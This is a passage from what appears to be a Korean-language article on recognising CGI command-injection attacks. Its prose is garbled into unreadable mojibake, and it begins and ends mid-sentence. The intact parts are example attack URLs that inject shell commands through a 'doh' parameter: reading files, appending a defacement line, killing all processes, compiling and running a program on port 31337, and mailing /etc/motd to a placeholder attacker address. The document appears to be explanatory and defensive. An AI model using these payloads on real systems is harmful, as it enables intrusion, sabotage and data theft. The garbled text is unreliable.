»ç¿ëµÇ¾î Áø´Ù. ÀÌ ¸í·É¾î´Â ½Ã½ºÅÛÀÇ È¯°æÆÄÀÏ, Æнº¿öµå ÆÄÀÏ, Å©·¹µðÆ® Ä«µå°ü·Ã ÆÄÀÏ, µîµî ´ç½ÅÀÌ »ý°¢ÇÒ ¼ö ÀÖ´Â °ÅÀÇ ¸ðµç Áß¿äÇÑ ÆÄÀϵéÀÇ ³»¿ëÀ» º¼ ¼ö ÀÖ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd; "echo" ¸í·É¾î. ÀÌ ¸í·ÉÀº Á¾Á¾ index.html°ú °°Àº ÆÄÀÏ ³»¿ëÀ» µ¡ºÙÀ϶§ »ç¿ëµÈ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt; "ps" ¸í·É¾î. ÀÌ ¸í·ÉÀº ÇöÀç ½ÇÇàÁßÀÎ ÇÁ·Î¼¼¼­ ¸®½ºÆ®¸¦ º¸¿© ÁØ´Ù. ÀÌ ¸í·ÉÀº °ø°ÝÀÚ¿¡°Ô ¿ø°ÝÁö ½Ã½ºÅÛ¿¡ ¾ÈÀüÄ¡ ¾ÊÀº ¼ÒÇÁÆ®¿þ¾î¸¦ ¾Ë·Á ÁÙ¼ö ÀÖ°í, ¶ÇÇÑ °ø°ÝÀÚ¿¡°Ô ½Ã½ºÅÛ³»ÀÇ ¸¹Àº Á¤º¸¸¦ ¾Ë·Á ÁÙ¼ö ÀÖ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=ps%20-aux; "kill, killall" ¸í·É¾î. ÀÌ ¸í·É¾î´Â À¯´Ð½º ½Ã½ºÅÛ¿¡¼­ ½ÇÇàÁßÀÎ ÇÁ·Î¼¼¼­¸¦ ÁßÁö½Ãų¶§ »ç¿ëµÇ¾î Áø´Ù. °ø°ÝÀÚ°¡ ÀÌ ¸í·É¾î¸¦ »ç¿ëÇÒ ¼ö ÀÖ´Ù¸é ½Ã½ºÅÛ ¼­ºñ½º³ª ÇÁ·Î±×·¥À» ÁßÁö½ÃÅ°°Å³ª Àç½ÃÀÛ ÇÒ ¼ö ÀÖ´Ù. °ø°ÝÀÚ´Â ÀÌ ¸í·ÉÀ» ¶ÇÇÑ ±×°¡ ½ÇÇà½ÃŲ ÇÁ·Î¼¼¼­¸¦ ÁßÁö ½ÃÅ°°Å³ª °ø°ÝÀÌÈÄ »ý¼ºÇÑ ÇÁ·Î¼¼¼­¸¦ ¾ø¾Ö´Âµ¥ »ç¿ëÇϱ⵵ ÇÑ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=kill%20-9%200; "uname" ¸í·É¾î. ÀÌ ¸í·É¾î´Â °ø°ÝÀÚ°¡ ¿ø°Ý½Ã½ºÅÛÀÇ È£½ºÆ® À̸§(Ä¿³Î, OSÁ¾·ù, ÆÐÄ¡¿©ºÎ, ReleaseÁ¤µµ)À» ¾Ë°íÀÚ ÇÒ¶§ »ç¿ëµÈ´Ù. ¶§¶§·Î À¥»çÀÌÆ®°¡ ISP¿¡ ¿¬°áµÇ¾î ÀÖÀ¸¸é ÀÌ ¸í·É¾î¸¦ ÅëÇØ ±×°¡ Á¢±Ù°¡´É(°ø°Ý°¡´ÉÇÑ)ÇÑ ¹æ¹ý¿¡ ´ëÇÑ ¾ÆÀ̵ð¾î¸¦ Á¦°øÇϱ⵵ ÇÕ´Ï´Ù. º¸Åë "uname -a"¸í·É¾î´Â ·Î±×ÆÄÀÏ¿¡¼­ ´ÙÀ½°ú °°ÀÌ ³ªÅ¸³³´Ï´Ù. "uname%20-a". ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=uname%20-a; "cc, gcc, perl, python, etc..." ÄÄÆÄÀÏ·¯/ÀÎÅÍÇÁ¸°ÅÍ ¾ð¾îµé. "cc"³ª ""gcc" ¸í·É¾î´Â ÇÁ·Î±×·¥ÀÇ ¼öÁ¤À» Çã¿ëÇÑ´Ù. °ø°ÝÀÚ´Â wgetÀ̳ª tftp¸í·ÉÀ» »ç¿ëÇÏ¿© °ø°Ý¼º Äڵ带 ´Ù¿î·Îµå ÇÑ ´ÙÀ½ ÀÌ ÄÄÆÄÀÏ·¯¸¦ ÀÌ¿ëÇÏ¿© ÇÁ·Î±×·¥À» ÆíÁýÇϱ⵵ ÇÑ´Ù. ¾Æ¹«°÷¿¡¼­³ª ÀÌ·¯ÇÑ °ÍÀÌ °¡´ÉÇÏ´Ù¸é, ·ÎÄà ½Ã½ºÅÛÀº ¾ÇÀÇÀûÀ¸·Î »ç¿ëµÉ ¼ö ÀÖ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337; ¸¸¾à °ø°ÝÀÚ°¡ "perl"À̳ª "python"À» À§ÇÑ ½ºÅ©¸³Æ® ¿äûÀ» º¸°Ô µÈ´Ù¸é °ø°ÝÀÚ´Â ¿ø°ÝÁö¿¡ perlÀ̳ª python½ºÅ©¸³Æ®¸¦ ´Ù¿î·Îµå ÇÒ °ÍÀÌ°í, ´ç½ÅÀÇ ½Ã½ºÅÛÀ» ¾ÇÀÇÀûÀ¸·Î ÀÌ¿ëÇÒ °ÍÀÌ´Ù. "mail" ¸í·É¾î. ÀÌ ¸í·É¾î´Â °ø°ÝÀÚ°¡ ÀÚ½ÅÀÇ À̸ÞÀÏ ÁÖ¼Ò·Î ¿ø°ÝÁö ½Ã½ºÅÛÀÇ Æ¯Á¤ ÆÄÀÏÀ» ¹Þ°íÀÚ ÇÒ¶§ ÁÖ·Î »ç¿ëµÈ´Ù. ¶ÇÇÑ mail¸í·É¾î´Â ½ºÆÔ¸Ó(´ë·®¸ÞÀÏÀ» ³×Æ®¿öÅ©¿¡ Àü¼ÛÇÏ´Â)¿¡°Ô ¸Å¿ì ÀÚÁÖ »ç¿ëµÇ´Â ¸í·É¾î À̱⵵ ÇÏ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@hostname%20<<%20/etc/motd| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=mail%20steele@jersey.whitehouse.gov%20<